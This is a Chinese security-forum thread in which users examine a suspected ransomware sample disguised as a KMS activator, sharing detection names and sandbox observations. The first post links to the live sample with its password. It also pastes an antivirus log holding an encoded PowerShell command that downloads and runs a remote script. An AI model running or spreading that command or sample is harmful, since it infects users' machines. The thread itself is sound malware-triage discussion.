查看: 1928|回复: 22
收起左侧

[可疑文件] 疑似伪装成kms的勒索病毒

[复制链接]
bananas12138
发表于 2022-6-13 22:36:16 | 显示全部楼层 |阅读模式
本帖最后由 bananas12138 于 2022-6-14 19:45 编辑

https://bananas12138.lanzouf.com/iw9ZP06d14pa
密码:hi0v
exe文件
前段时间就有人说在微当下载站下载的heu kms有问题
昨天有个群友也碰上了
微当上三个kms仅有两个可以下载,而且只有这一个被火绒扫出来,卡巴落地杀
图片源自“病毒吧”和“勒索病毒吧”
我能力有限,尝试下载运行了上面的kms,没办法复现
ps:看到有不少人中招了
编辑:看了下受害者描述,大概是延时触发(?),而且虚拟机双击的时候启动了powershell.exe,微步云分析:通过创建计划任务实现定时启动但是另外一个kms没有这个进程
不知道是不是因为版本问题

最新:火绒拦截(06.14 19:45)

防护项目:利用PowerShell执行可疑脚本
执行文件:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
执行命令行:powershell.exe -ep bypass -e SQBFAFgAIAAoACgAbgBlAHcALQBvAGIAagBlAGMAdAAgAG4AZQB0AC4AdwBlAGIAYwBsAGkAZQBuAHQAKQAuAGQAbwB3AG4AbABvAGEAZABzAHQAcgBpAG4AZwAoACcAaAB0AHQAcAA6AC8ALwBpAHAALgBzAGUAYQByAGMAaABuAG8AdwBtAC4AYwBsAHUAYgAnACkAKQA=
操作结果:已允许

进程ID:792
操作进程:C:\Windows\System32\svchost.exe
操作进程命令行:C:\Windows\system32\svchost.exe -k netsvcs -p
父进程ID:708
父进程:C:\Windows\System32\services.exe
父进程命令行:C:\Windows\system32\services.exe

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x
Tom179090
发表于 2022-6-13 22:38:44 | 显示全部楼层
BD:potentially unwanted application
Detection name: Gen:Variant.Application.Graftor.747926
aboringman
发表于 2022-6-13 22:39:33 | 显示全部楼层

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x
bananas12138
 楼主| 发表于 2022-6-13 22:42:55 | 显示全部楼层

有没有办法确定存不存在勒索行为呢?
aboringman
发表于 2022-6-13 22:46:47 | 显示全部楼层
本帖最后由 aboringman 于 2022-6-13 23:21 编辑
bananas12138 发表于 2022-6-13 22:42
有没有办法确定存不存在勒索行为呢?

虚拟机里跑一下就知道了。

https://www.virustotal.com/gui/f ... 8e34862dd?nocache=1

我越来越觉得他就是KMS。。。。。。微步上也没有出现跟勒索相关的操作。。。。。。
bananas12138
 楼主| 发表于 2022-6-13 22:50:45 | 显示全部楼层
本帖最后由 bananas12138 于 2022-6-13 22:54 编辑
aboringman 发表于 2022-6-13 22:46
虚拟机里跑一下就知道了。

看卡巴和ESET的报法,这货不像是PUA,应该是真的Malware。

虚拟机没有跑出来不知道其他kms有没有这种情况,这个双击的时候启动了powershell.exe
微步云:通过创建计划任务实现定时启动

onedrive
发表于 2022-6-13 22:58:45 | 显示全部楼层
咖啡RP,但无法处理要求联系客服(智障设计)
huangzihang
发表于 2022-6-13 23:11:57 | 显示全部楼层
onedrive 发表于 2022-6-13 22:58
咖啡RP,但无法处理要求联系客服(智障设计)

Norton power eraser:你再骂
Eset小粉絲
发表于 2022-6-13 23:15:08 | 显示全部楼层
没发现加密行为
onedrive
发表于 2022-6-13 23:18:25 | 显示全部楼层
huangzihang 发表于 2022-6-13 07:11
Norton power eraser:你再骂

NPE应急嘛,但是咖啡这个扫描是右键嘞,设计成这样就很反人类
您需要登录后才可以回帖 登录 | 快速注册

本版积分规则

手机版|杀毒软件|软件论坛| 卡饭论坛

Copyright © KaFan  KaFan.cn All Rights Reserved.

Powered by Discuz! X3.4( 沪ICP备2020031077号-2 ) GMT+8, 2024-12-22 15:57 , Processed in 0.132672 second(s), 17 queries .

卡饭网所发布的一切软件、样本、工具、文章等仅限用于学习和研究,不得将上述内容用于商业或者其他非法用途,否则产生的一切后果自负,本站信息来自网络,版权争议问题与本站无关,您必须在下载后的24小时之内从您的电脑中彻底删除上述信息,如有问题请通过邮件与我们联系。

快速回复 客服 返回顶部 返回列表